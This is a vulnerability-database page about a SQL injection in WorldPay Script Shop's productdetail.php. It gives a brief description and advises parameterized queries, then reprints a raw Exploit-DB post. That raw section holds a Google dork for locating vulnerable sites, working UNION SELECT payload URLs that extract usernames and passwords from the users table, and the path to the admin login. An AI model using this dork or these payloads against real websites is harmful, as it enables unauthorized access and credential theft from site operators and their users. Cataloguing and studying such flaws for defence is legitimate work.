header-logo
Suggest Exploit
vendor:
Script Shop
by:
Err0R
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Script Shop
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WorldPay Script Shop (productdetail) SQL Injection Vulnerability

A SQL injection vulnerability exists in WorldPay Script Shop (productdetail) which allows an attacker to inject malicious SQL queries via the 'id' parameter in the 'productdetail.php' script. An attacker can exploit this vulnerability to gain access to sensitive information such as usernames and passwords from the database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Sanitize all user input and use parameterized queries.
Source

Exploit-DB raw data:

============================================
| WorldPay Script Shop (productdetail) SQL Injection Vulnerability
============================================
# (+) Author: Err0R
# (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
# (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
=====================================
~~~~~~~~~~~~~~~~~~~~
dork (Google): intext:"Powered By WorldPay" inurl:productdetail.php
~~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/productdetail.php?id=-231+union+select+1,2,3,4,5--
And you come the enject ,,
Demo :-
User name : http://server/productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db.tbl_users<http://server/productdetail.php?id=-231+union+select+1,2,3,userName,5+from+watch2td_db.tbl_users>--
Password : http://server/productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db.tbl_users<http:http://server/productdetail.php?id=-231+union+select+1,2,3,password,5+from+watch2td_db.tbl_users>--
admin Login : Site /path/login.php
=============================================================
#====GreeTZ===============#
#all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
#and all in My email : ) #
#======================#